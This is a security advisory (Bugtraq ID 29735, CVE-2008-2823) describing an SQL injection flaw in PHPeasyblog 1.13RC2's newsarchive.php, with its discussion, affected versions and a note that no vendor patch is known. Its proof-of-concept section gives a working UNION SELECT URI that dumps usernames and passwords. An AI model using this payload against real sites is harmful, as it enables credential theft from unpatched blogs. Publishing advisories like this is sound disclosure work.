PHPeasyblog 'newsarchive.php' SQL Injection Vulnerability
BID:29735
Info
PHPeasyblog 'newsarchive.php' SQL Injection Vulnerability
| Bugtraq ID: | 29735 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-2823 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 14 2008 12:00AM |
| Updated: | May 07 2015 05:28PM |
| Credit: | t0pP8uZz |
| Vulnerable: |
PHPeasyblog PHPeasyblog 1.13RC2 |
| Not Vulnerable: | |
Discussion
PHPeasyblog 'newsarchive.php' SQL Injection Vulnerability
PHPeasyblog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions up to and including PHPeasyblog 1.13 RC2 are vulnerable; other versions may also be affected.
PHPeasyblog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions up to and including PHPeasyblog 1.13 RC2 are vulnerable; other versions may also be affected.
Exploit / POC
PHPeasyblog 'newsarchive.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/newsarchive.php?post=-1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(username,0x3a,password),3,4,5,6/**/FROM/**/pen_users/*
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/newsarchive.php?post=-1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(username,0x3a,password),3,4,5,6/**/FROM/**/pen_users/*
Solution / Fix
PHPeasyblog 'newsarchive.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: %[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: %[email protected].
References
PHPeasyblog 'newsarchive.php' SQL Injection Vulnerability
References:
References:
- PHPeasyblog 1.13RC2 Download Page (PHPeasyblog)